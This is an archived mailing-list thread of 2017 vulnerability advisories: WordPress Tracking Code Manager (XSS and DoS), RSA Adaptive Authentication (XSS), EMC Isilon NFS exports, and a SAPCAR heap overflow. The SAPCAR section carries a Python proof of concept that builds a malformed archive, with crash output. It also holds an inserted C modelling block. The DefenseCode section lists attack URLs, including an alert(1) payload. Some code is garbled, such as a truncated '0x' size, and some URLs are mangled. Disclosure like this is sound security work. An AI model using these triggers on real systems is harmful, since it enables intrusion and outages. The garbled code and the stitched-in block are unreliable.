DefenseCode ThunderScan SAST Advisory: WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities

2017-05-11 Thread DefenseCode

DefenseCode ThunderScan SAST Advisory
WordPress Tracking Code Manager Plugin
Multiple Security Vulnerabilities


Advisory ID: DC-2017-01-020
Advisory Title: WordPress Tracking Code Manager Plugin Multiple
Vulnerabilities
Advisory URL:
http://www.defensecode.com/advisories/DC-2017-01-020_WordPress_Tracking_Code_Manager_Plugin_Advisory.pdf
Software: WordPress Tracking Code Manager
Software Language: PHP
Version: 1.11.1 and below
Vendor Status: Vendor contacted
Release Date: 2017-05-10
Risk: Medium



1. General Overview
===
During the security audit of Tracking Code Manager plugin for
WordPress CMS, multiple vulnerabilities were discovered using
DefenseCode ThunderScan application source code security analysis
platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview

According to the developers, Tracking Code Manager is a plugin to
manage all your tracking code and conversion pixels, simply.
Compatible with Facebook Ads, Google Adwords, WooCommerce, Easy
Digital Downloads, WP eCommerce.

It has more than 40,000 downloads on wordpress.org.

Homepage: https://wordpress.org/plugins/tracking-code-manager/


3. Brief Vulnerability Description
==
During the security analysis, ThunderScan discovered Cross-Site
Scripting and remote Denial of Service vulnerabilities in the Tracking
Code Manager plugin. The Denial of Service requires only one visit to a
specific URL, after which the whole WordPress installation becomes
completely unresponsive until it is restarted. The DoS is based on the
ability of the user to select and call a function of their choice
(while satisfying specific conditions). By making a recursive call to
the function that handles the request (tcmp_do_action()), a DoS can
easily be accomplished.

Both vulnerabilities can be found in the settings section of the
plugin, and can be remotely triggered because the nonce token and its
validation are missing. Since the DoS vulnerability relies on GET
requests and no nonce token is checked, it is also directly exposed to
attack vectors such as Cross-Site Request Forgery (CSRF).

The DoS vulnerability was confirmed on Windows.

3.1 Cross-Site Scripting
  URL Parameter: tcmp_action
  Vulnerable URL:
http://vulnerablesite.com/wp-admin/options-general.php?page=tracking-code-manager=editor_action=alert(1)

3.2 Denial of Service
  Function: tcmp_do_action()
  Vulnerable URL:
http://vulnerablesite.com/wp-admin/options-general.php?page=tracking-code-manager=editor_action=do_action


4. Solution
===
Vendor should resolve the security issues in next release. All users
are strongly advised to update WordPress Tracking Code Manager plugin
to the latest available version as soon as the vendor releases an
update.


5. Credits
==
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski

 
6. Disclosure Timeline
==
04/04/2017  Vendor contacted
07/04/2017  Vendor responded: "We will fix it in the next update"
10/05/2017  Advisory released to the public


7. About DefenseCode

DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com/
Twitter: https://twitter.com/DefenseCode/



ESA-2017-017: RSA® Adaptive Authentication (On-Premise) Cross-Site Scripting Vulnerability

2017-05-11 Thread EMC Product Security Response Center


EMC Identifier: ESA-2017-017: RSA® Adaptive Authentication (On-Premise) 
Cross-Site Scripting Vulnerability
CVE Identifier: CVE-2017-4978
 
Severity Rating: CVSS v3 Score: 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
  
Affected Products:
RSA Adaptive Authentication (On-Premise) versions prior to 7.3 P2 (exclusive)
 
Summary: 
RSA Adaptive Authentication (On-Premise) contains a fix for a cross-site 
scripting vulnerability that could potentially be exploited by malicious users 
to compromise the affected system.
 
Details: 
RSA Adaptive Authentication (On-Premise) is affected by a cross-site scripting 
vulnerability. Attackers could potentially exploit this vulnerability to 
execute arbitrary HTML or JavaScript code in the user’s browser session in the 
context of the affected application.
 
Recommendation:
The following RSA Adaptive Authentication (On-Premise) release contains 
resolution to this vulnerability:
•   RSA Adaptive Authentication (On-Premise) version 7.3 P2 and later
 
RSA recommends all customers upgrade at the earliest opportunity.
 
For additional documentation, downloads, and more, visit the RSA Adaptive
Authentication page on RSA Link.
 
Severity Rating:
For an explanation of Severity Ratings, refer to the Security Advisories 
Severity Rating knowledge base article. RSA recommends all customers take into 
account both the base score and any relevant temporal and environmental scores 
which may impact the potential severity associated with particular security 
vulnerability.
 
EOPS Policy:
RSA has a defined End of Primary Support policy associated with all major 
versions. Please refer to the Product Version Life Cycle for additional details.
 
RSA Link Security Advisories:
Read and use the information in this RSA Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact RSA Software 
Technical Support at 1-800-995-5095. RSA Security LLC and its affiliates, 
including without limitation, its ultimate parent company, Dell Technologies, 
distribute RSA Security Advisories in order to bring to the attention of users 
of the affected RSA products, important security information. RSA recommends 
that all users determine the applicability of this information to their 
individual situations and take appropriate action. The information set forth 
herein is provided "as is" without warranty of any kind. RSA disclaims all 
warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event shall RSA, its affiliates or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if RSA, its affiliates or its 
suppliers have been advised of the possibility of such damages. Some 
jurisdictions do not allow the exclusion or limitation of liability for 
consequential or incidental damages, so the foregoing limitation may not apply.


ESA-2017-027: EMC Isilon OneFS NFS Export Upgrade Vulnerability

2017-05-11 Thread EMC Product Security Response Center


ESA-2017-027: EMC Isilon OneFS NFS Export Upgrade Vulnerability

EMC Identifier: ESA-2017-027 

CVE Identifier: CVE-2017-4979

Severity Rating: CVSS v3 Base Score: 7.1 (AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H)

Affected products:  The issue occurs in the following versions after an upgrade 
from OneFS 7.1.1.x or earlier: 

•   OneFS 8.0.1.0
•   OneFS 8.0.0.0 - 8.0.0.2
•   OneFS 7.2.1.0 - 7.2.1.3
•   OneFS 7.2.0.x

Summary:  EMC Isilon OneFS is affected by an NFS export vulnerability. Under 
certain conditions, after upgrading a cluster from OneFS 7.1.1.x or earlier, 
users may have unexpected levels of access to some NFS exports. 

Details:  
EMC Isilon OneFS is affected by the OneFS NFS Export Upgrade Vulnerability.  
Changing the default export permissions, after having created exports and then 
upgrading OneFS, can result in giving access to users that shouldn’t have it, 
or in prohibiting access to those that should have access.


Resolution:  
The following versions of EMC Isilon OneFS resolve this vulnerability:
•   EMC Isilon OneFS 8.0.1.1
•   EMC Isilon OneFS 8.0.0.3
•   EMC Isilon OneFS 7.2.1.4
If you cannot upgrade at this time, please see article 487758 for instructions 
to perform a workaround.  
Remediation:
If the issue has already occurred, you must manually fix each export file for 
which the settings were incorrectly overridden. If you need assistance, contact 
Isilon Technical Support.
Link to remedies:

Registered EMC Online Support customers can download OneFS installation files 
from the Downloads for Isilon OneFS page of the EMC Online Support site at 
https://support.emc.com/downloads/15209_Isilon-OneFS. 

If you have any questions, please contact EMC Support.


[The following is standard text included in all security advisories.  Please do 
not change or delete.]

Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC Corporation distributes EMC Security Advisories, in order to bring to the 
attention of users of the affected EMC products, important security 
information. EMC recommends that all users determine the applicability of this 
information to their individual situations and take appropriate action. The 
information set forth herein is provided "as is" without warranty of any kind. 
EMC disclaims all warranties, either express or implied, including the 
warranties of merchantability, fitness for a particular purpose, title and 
non-infringement. In no event, shall EMC or its suppliers, be liable for any 
damages whatsoever including direct, indirect, incidental, consequential, loss 
of business profits or special damages, even if EMC or its suppliers have been 
advised of the possibility of such damages. Some states do not allow the 
exclusion or limitation of liability for consequential or incidental damages, 
so the foregoing limitation may not apply.





[CORE-2017-0001] - SAP SAPCAR Heap Based Buffer Overflow Vulnerability

2017-05-11 Thread Core Security Advisories Team
1. *Advisory Information*

Title: SAP SAPCAR Heap Based Buffer Overflow Vulnerability
Advisory ID: CORE-2017-0001
Advisory URL: http://www.coresecurity.com/advisories/sap-sapcar-heap-based-buffer-overflow-vulnerability
Date published: 2017-05-10
Date of last update: 2017-05-10
Vendors contacted: SAP
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Heap-based Buffer Overflow [CWE-122]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2017-8852

3. *Vulnerability Description*

SAP [1] distributes software and packages using an archive program
called SAPCAR [2].
This program uses a custom archive file format. A memory corruption
vulnerability was found in the parsing of specially crafted archive
files that could lead to local code execution.

4. *Vulnerable Packages*

SAPCAR archive tool version 721.510
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

SAP published the following Security Notes:
   . 2441560

6. *Credits*

This vulnerability was discovered and researched by Martin Gallo and
Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from
Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

This vulnerability is caused by a controlled heap buffer overflow when
opening a specially crafted CAR archive file.

The following python code can be used to generate an archive file that
triggers the vulnerability:

/-
#!/usr/bin/env python

from scapy.packet import Raw
from pysap.SAPCAR import *

# We write a file just to have some data to put into the archive
with open("string.txt", "w") as fd:
    fd.write("Some string to compress")

# Create a new SAP CAR Archive
f = SAPCARArchive("poc.car", mode="wb", version=SAPCAR_VERSION_200)
# Add the text file
f.add_file("string.txt")

# Replace the blocks in the compressed file with the faulty blocks
f._sapcar.files0[0].blocks.append(Raw("D>" + "\x00"*30 + "\x00\xff"))
f._sapcar.files0[0].blocks.append(Raw("A" * 0x))

# Write the file
f.write()

$ ./SAPCAR -tvf poc.car
SAPCAR: processing archive poc.car (version 2.00)
-rw-rw-r--  2309 Feb 2017 18:12 string.txt
Segmentation fault (core dumped)
-/


Version 2.00 CAR archive files consist of an archive header and a list
of archived files [3]. Each archived file has a header containing the
file's metadata, and the content of the file is split among several
blocks.
When the SAPCAR program opens a file containing an archived file block
of a type other than the known ones [4], it reads an additional 32
bytes of file metadata. The program then uses the last two bytes of the
data read as a size field, and copies that amount of data into a
fixed-length buffer previously allocated in the heap. As the length
field is not properly validated, the operation results in a heap-based
buffer overflow.

It's worth mentioning that signature validation doesn't prevent the
vulnerability from being triggered, as the signature file needs to be
extracted from the archive before the validation can be performed.
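The parse step described above, modelled in C as an added example (this is not SAPCAR's or pysap's code): an unknown block type is followed by 32 bytes of metadata whose last two bytes give a size, and the hardened reader checks that size against the destination capacity and the remaining input before copying. The block layout, the known-type set and the big-endian reading of the size field are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added illustration, not SAPCAR's or pysap's code. Models the step the advisory
 * describes: a block whose 2-byte type is unknown is followed by 32 bytes of
 * metadata whose last two bytes are taken as a size. The layout, the known-type
 * set and the big-endian reading of the size are assumptions for this example. */

#define BLOCK_TYPE_LEN   2
#define UNKNOWN_META_LEN 32
#define BLOCK_HDR_LEN    (BLOCK_TYPE_LEN + UNKNOWN_META_LEN)

enum blk_status { BLK_OK = 0, BLK_TRUNCATED = -1, BLK_TOO_LARGE = -2 };

static int block_type_known(const uint8_t *t) {          /* assumed set */
    return (t[0] == 'E' && t[1] == 'D') || (t[0] == 'D' && t[1] == 'G');
}

/* Hardened copy: the declared size is checked against the destination capacity
 * (the check the advisory says is missing before the copy into a fixed-length
 * heap buffer) and against the bytes actually left in the input. */
enum blk_status read_unknown_block(const uint8_t *buf, size_t len, uint8_t *out,
                                   size_t out_cap, size_t *copied) {
    *copied = 0;
    if (len < BLOCK_HDR_LEN) return BLK_TRUNCATED;
    if (block_type_known(buf)) return BLK_OK;             /* handled elsewhere */
    uint16_t size = (uint16_t)((buf[BLOCK_HDR_LEN - 2] << 8) | buf[BLOCK_HDR_LEN - 1]);
    if (size > out_cap) return BLK_TOO_LARGE;             /* the missing check */
    if (len - BLOCK_HDR_LEN < size) return BLK_TRUNCATED;
    memcpy(out, buf + BLOCK_HDR_LEN, size);
    *copied = size;
    return BLK_OK;
}

/* Constructed input mirroring the PoC layout: type "D>", 30 zero bytes, the
 * 2-byte size, then that many 'A' bytes. Returns the total length, 0 on error. */
size_t build_poc_block(uint8_t *dst, size_t dst_cap, uint16_t payload_len) {
    size_t total = BLOCK_HDR_LEN + payload_len;
    if (total > dst_cap) return 0;
    memset(dst, 0, BLOCK_HDR_LEN);
    dst[0] = 'D'; dst[1] = '>';
    dst[BLOCK_HDR_LEN - 2] = (uint8_t)(payload_len >> 8);
    dst[BLOCK_HDR_LEN - 1] = (uint8_t)(payload_len & 0xff);
    memset(dst + BLOCK_HDR_LEN, 'A', payload_len);
    return total;
}
```

With a 64-byte destination the constructed block is rejected with BLK_TOO_LARGE, which is the case the unchecked copy turned into a heap overflow.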

8. *Report Timeline*

2017-02-15: Core Security sent an initial notification to SAP.
2017-02-16: SAP confirmed the reception of the email and requested the
draft version of the advisory.
2017-02-16: Core Security sent SAP a draft version of the advisory and
informed them we would adjust our publication schedule according to
the release of a solution to the issues.
2017-02-17: SAP confirmed reception of the draft advisory and assigned
the incident ticket 1780137949 for tracking this issue. They would
answer back once their team analyzed the report.
2017-03-06: Core Security asked SAP for news about the advisory and
publication date.
2017-03-08: SAP answered back saying they had trouble generating the
SAPCAR archive. They asked for a pre-built one.
2017-03-08: Core Security researcher sent a PoC SAPCAR archive that can
trigger the vulnerability. SAP confirmed reception.
2017-03-08: SAP asked for GPG key for one of the researchers involved
in the discovery. Core Security sent (again) the key. SAP confirmed
reception.
2017-03-13: SAP confirmed they could reproduce the vulnerability. They
said they could not commit to a publication date yet, but were aiming
at May 9th, although it could fall on the April Patch Day or be
postponed until after May.
2017-03-13: Core Security thanked SAP for the tentative date and
informed them we would publish our security advisory accordingly upon
their confirmation.
2017-04-03: Core Security asked SAP for an update about the final
publication date for this vulnerability's patch.
2017-04-05: SAP confirmed they will be able to release the fix in May,
although there could be chances to release it in April. They will
confirm as soon as possible.
2017-04-05: Core Security thanked SAP for the update and asked for a
security note number and CVE (if